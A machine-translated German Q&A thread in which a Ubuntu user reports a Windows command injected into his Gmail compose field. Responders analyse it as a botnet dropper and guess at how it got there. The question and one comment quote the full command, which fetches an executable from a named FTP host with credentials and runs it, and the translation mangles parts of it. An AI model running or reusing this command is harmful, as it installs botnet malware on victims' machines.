Wie kann ich feststellen, ob mein Linux-Computer gehackt wurde?

126

Mein Heim-PC ist normalerweise eingeschaltet, aber der Monitor ist ausgeschaltet. Heute Abend kam ich von der Arbeit nach Hause und fand einen Hackversuch: In meinem Browser war mein Google Mail-Konto geöffnet (das war ich), aber es war im Kompositionsmodus mit den folgenden Inhalten TO Feld:

md / c echo open cCTeamFtp.yi.org 21 & gt; & gt; ik & amp; echo user ccteam10 765824 & gt; & gt; ik & amp; binäres Echo & gt; & gt; ik & amp; echo get svcnost.exe & gt; & gt; ik & amp; Echo bye & gt; & gt; ik & amp; ftp -n -v -s: ik & amp; del ik & amp; svcnost.exe & amp;   Echo Du hast gehört

Das sieht für mich nach Windows-Befehlszeilencode aus, und der md Der Start des Codes in Verbindung mit der Tatsache, dass sich Google Mail im Erstellungsmodus befand, zeigt, dass jemand versucht hat, eine cmd Befehl. Ich schätze, ich hatte Glück, dass ich Windows nicht auf diesem PC ausführe, aber ich habe andere, die dies tun. Dies ist das erste Mal, dass mir so etwas passiert ist. Ich bin kein Linux-Guru und habe zu diesem Zeitpunkt außer Firefox keine anderen Programme ausgeführt.

Ich bin mir absolut sicher, dass ich das nicht geschrieben habe und niemand anderes physisch an meinem Computer war. Außerdem habe ich kürzlich mein Google-Passwort (und alle meine anderen Passwörter) in so etwas wie geändert vMA8ogd7bv Ich glaube nicht, dass jemand mein Google-Konto gehackt hat.

Was ist gerade passiert? Wie kann jemand Tastatureingaben auf meinem Computer ausführen, wenn nicht auf dem alten Windows-Computer von Oma seit Jahren Malware ausgeführt wird, sondern auf einem kürzlich neu installierten Ubuntu?

Aktualisieren:
Lassen Sie mich einige der Punkte und Fragen ansprechen:

  • Ich bin in Österreich, auf dem Land. Mein WLAN Router läuft WPA2 / PSK und ein mittelstarkes Passwort, das nicht im Wörterbuch enthalten ist; müsste brachial und weniger als 50 Meter von hier sein; Es ist unwahrscheinlich, dass es gehackt wurde.
  • Ich verwende eine USB-Tastatur, daher ist es sehr unwahrscheinlich, dass sich jemand in Reichweite befindet, um sie zu hacken.
  • Ich habe meinen Computer zu der Zeit nicht benutzt. es war nur zu Hause im Leerlauf, während ich bei der Arbeit war. Da es sich um einen am Monitor montierten Nettop-PC handelt, schalte ich ihn selten aus.
  • Die Maschine ist nur zwei Monate alt, läuft nur mit Ubuntu und ich benutze keine seltsame Software oder besuche seltsame Seiten. Es geht hauptsächlich um Stack Exchange, Google Mail und Zeitungen. Keine Spiele. Ubuntu soll sich auf dem Laufenden halten.
  • Mir ist nicht bekannt, dass ein VNC-Dienst ausgeführt wird. Ich habe keinesfalls eines installiert oder aktiviert. Ich habe auch keine anderen Server gestartet. Ich bin mir nicht sicher, ob in Ubuntu standardmäßig welche ausgeführt werden?
  • Ich kenne alle IP-Adressen in der Google Mail-Kontoaktivität. Ich bin mir ziemlich sicher, dass Google kein Eingang ist.
  • Ich habe einen ... gefunden Protokolldatei-Viewer , aber ich weiß nicht, wonach ich suchen soll. Hilfe?

Was ich wirklich wissen möchte, und was mich wirklich unsicher macht, ist: Wie kann jemand aus dem Internet Tastatureingaben auf meinem Computer generieren? Wie kann ich das verhindern, ohne alles darüber zu wissen? Ich bin kein Linux-Freak, sondern ein Vater, der sich seit über 20 Jahren mit Windows beschäftigt und es satt hat. Und in all den über 18 Jahren, in denen ich online war, habe ich noch nie einen Hackversuch gesehen. Das ist also neu für mich.

Torben Gundtofte-Bruun
quelle
4
Hatte noch jemand Zugriff auf Ihren Computer oder haben Sie eine sehr alte drahtlose Tastatur? Außerdem verfügt Ubuntu über einen eingebauten VNC-Server. Wenn dies aktiv ist, könnte sich irgendwo ein zufälliges Skript verbunden haben und annehmen, dass es sich um einen Windows-Computer handelt, der die Tastatureingaben WIN + R, cmd ...... sendet.
TuxRug
29
@torbengb: Dein Beitrag Ja wirklich verängstigt mich...
Mehrdad
9
Befinden sich noch andere Computer in Ihrem drahtlosen Netzwerk? Wenn der Eindringling brach ihr Sicherheit würde es ihm ein "In" für Ihr lokales Netzwerk geben, was dazu führen könnte, dass die Ubuntu-Box auf verschiedene Arten geknackt wird.
CarlF
4
@muntoo ... und sicher hast du das nirgendwo aufgeschrieben und benutzt auch keine App um sie zu verwalten, oder? Beginnen wir nicht mit dem Bashing von Passwörtern. Zumindest ist mein Passwort nicht password :-)
Torben Gundtofte-Bruun
6
Hast du eine Katze?
Zaki

Antworten:

66

Ich bezweifle, dass Sie sich Sorgen machen müssen. Es war mehr als wahrscheinlich ein JavaScript-Angriff, der versuchte, eine Fahren Sie per Download . Wenn Sie dies befürchten, beginnen Sie mit NoScript und Adblock Plus Firefox-Add-Ons.

Selbst wenn Sie vertrauenswürdige Websites besuchen, sind Sie nicht sicher, da dort JavaScript-Code von Drittanbietern ausgeführt wird, der böswillig sein kann.

Ich packte es und ließ es in einer VM laufen. Es hat mirc installiert und dies ist das Statusprotokoll ... http://pastebin.com/Mn85akMk

Es ist ein automatisierter Angriff, der versucht, Sie dazu zu bringen, mIRC herunterzuladen und sich einem Botnetz anzuschließen, das Sie in einen Spambot verwandelt. Meine VM hat sich angeschlossen und eine Verbindung zu einer Reihe verschiedener entfernter Adressen hergestellt, von denen eine ist autoemail-119.west320.com.

Unter Windows 7 musste ich die UAC-Eingabeaufforderung akzeptieren und den Zugriff über die Firewall zulassen.

Es scheint Unmengen von Berichten über diesen genauen Befehl in anderen Foren zu geben, und jemand sagt sogar, dass eine Torrent-Datei versucht hat, ihn auszuführen, als der Download abgeschlossen war ... Ich bin mir jedoch nicht sicher, wie das möglich wäre.

Ich habe dies selbst nicht verwendet, aber es sollte Ihnen die aktuellen Netzwerkverbindungen anzeigen können, damit Sie sehen können, ob Sie mit etwas außerhalb der Norm verbunden sind: http://netactview.sourceforge.net/download.html

Riguez
quelle
10
Äh, warum waren alle Kommentare (sogar die hoch hoch relevant diejenigen, die festgestellt haben, dass das Skript versucht hat, eine cmd Fenster) gelöscht !?
BlueRaja - Danny Pflughoeft
Wäre ich vor solchen Angriffen genauso sicher, wenn ich gerade erst mit der Verwendung von uBlock Origin begonnen hätte?
RobotUnderscore
41

Ich bin einverstanden mit @ jb48394 dass es wahrscheinlich ein JavaScript-Exploit ist, wie alles andere in diesen Tagen.

Die Tatsache, dass es versucht, eine zu öffnen cmd Fenster (sehen @ Torbengbs Kommentar ) und führen Sie einen böswilligen Befehl aus, anstatt den Trojaner diskret im Hintergrund herunterzuladen, was darauf hindeutet nutzt eine Sicherheitslücke in Firefox aus, die die Eingabe von Tastatureingaben ermöglicht, jedoch keine Code-Ausführung.

Dies erklärt auch, warum dieser Exploit war deutlich Exklusiv für Windows geschrieben, würde auch unter Linux funktionieren: Firefox führt JavaScript in allen Betriebssystemen auf dieselbe Weise aus (Zumindest versucht es :)) . Wenn es durch einen Pufferüberlauf oder einen ähnlichen für Windows bestimmten Exploit verursacht worden wäre, wäre das Programm nur abgestürzt.

Woher der JavaScript-Code stammt - wahrscheinlich eine böswillige Google-Anzeige (Anzeigenzyklus in Google Mail über den Tag verteilt) . Es würde nicht Sein das zuerst Zeit .

BlueRaja - Danny Pflughoeft
quelle
4
Nette Referenzen.
kizzx2
9
Zu Ihrer Information: Für Skimmer besteht dieser letzte "Link" aus fünf separaten Links.
Pops
Es wäre ziemlich schockierend, wenn es wirklich ein Javascript-Exploit wäre, da mein Firefox normalerweise tagelang geöffnet bleibt. Sie müssen jedoch eine spezielle API aufrufen, um Schlüssel unter Windows an ein anderes System und möglicherweise einen anderen Systemaufruf (falls vorhanden) unter Linux zu senden. Da das Senden von Tastenanschlägen keine normale JavaScript-Operation ist, bezweifle ich, dass Firefox dafür einen plattformübergreifenden Aufruf implementieren würde.
billc.cn
1
@ billc.cn: Ich glaube, in den PS / 2-Tastaturpuffer zu schreiben Funktioniert unabhängig vom Betriebssystem .
BlueRaja - Danny Pflughoeft
12

ich fand ein ähnlicher Angriff auf einem anderen Linux-Rechner. Es scheint eine Art FTP-Befehl für Windows zu sein.

Shekhar
quelle
8
Genauer gesagt wird die Datei heruntergeladen und ausgeführt ftp://ccteam10:[email protected]/svcnost.exe unter Windows ftp Befehlszeilenprogramm.
grawity
fand es auch auf Pastebin pastebin.com/FXwRpKH4
Shekhar
Hier gibt es Infos zur Seite whois.domaintools.com/216.210.179.67
Shekhar
9
Es ist ein WinRAR SFX-Paket, das eine portable mIRC-Installation und eine Datei mit dem Namen "DriverUpdate.exe" enthält. DriverUpdate.exe führt (mindestens) zwei Shell-Befehle aus: netsh firewall set opmode disable und Taskkill / F / IM VCSPAWN.EXE / T Es wird auch versucht (glaube ich) hinzuzufügen die-freesms-seite.com zur vertrauenswürdigen Zone und Proxy-Umgehung von Internet Explorer.
Andrew Lambert
5

Dies beantwortet nicht Ihre ganze Frage, sondern sucht in der Protokolldatei nach fehlgeschlagenen Anmeldeversuchen.

Wenn Ihr Protokoll mehr als fünf fehlgeschlagene Versuche enthält, hat jemand versucht zu knacken root. Wenn erfolgreich versucht wurde, sich anzumelden root während du nicht an deinem Computer warst, ändere sofort dein Passwort !! Ich meine JETZT! Am liebsten etwas alphanumerisches und ca. 10 Zeichen lang.

Mit den Nachrichten, die Sie erhalten haben (die echo Kommandos) Das klingt wirklich wie etwas Unreifes Drehbuch Kiddie . Wenn es ein echter Hacker wäre, der weiß, was er tut, würden Sie wahrscheinlich immer noch nichts davon wissen.

Nate Koppenhaver
quelle
2
Ich stimme zu, dass dies offensichtlich sehr amateurhaft war. Zumindest hätten sie nicht setzen sollen Echo, du warst im Besitz Am Ende. Ich frage mich, ob "echte Hacker" jemals durchgekommen sind? Oder in der Tat sollte ich vielleicht fragen, wie viele?
Torben Gundtofte-Bruun
1
@torgengb: Wenn der Befehl in einer Windows-Eingabeaufforderung ausgeführt würde, würde das Echo nicht angezeigt (aufgrund der &exit )
BlueRaja - Danny Pflughoeft
-1

whois Berichte west320.com steht im Eigentum von Microsoft.

UPnP und Vino (System - & gt; Einstellungen - & gt; Remotedesktop) kombiniert mit einem schwachen Ubuntu-Passwort?

Haben Sie nicht standardmäßige Repositorys verwendet?

DEF CON Jedes Jahr findet ein Wi-Fi-Wettbewerb statt, bei dem es darum geht, wie weit ein Wi-Fi-Zugangspunkt entfernt ist - das letzte Mal, dass ich davon hörte, waren es 250 Meilen.

Wenn Sie wirklich Angst haben möchten, sehen Sie sich die Screenshots eines Command-n-Control-Centers von a an Zeus-Botnetz . Keine Maschine ist sicher, aber Firefox unter Linux ist sicherer als die anderen. Noch besser, wenn du rennst SELinux .

rjt
quelle
1
Der Autor dieses Exploits hatte offenbar nicht die Absicht, dies unter Linux auszuführen, daher bezweifle ich, dass es irgendetwas mit einem anfälligen Gnomendienstprogramm oder einem schwachen Passwort zu tun hat (OP hat auch schon erwähnt, dass er ein sicheres Passwort hat)
BlueRaja - Danny Pflughoeft
Eigentlich erwähnt er nicht, dass er ein Ubuntu-Passwort hat, nur ein Google Mail-Passwort und eine drahtlose Passphrase. Ein Kind, das Metasploit ausführt, weiß vielleicht nicht einmal etwas über Linux, er sieht nur VNC. Es handelt sich höchstwahrscheinlich um einen Javascript-Angriff.
rjt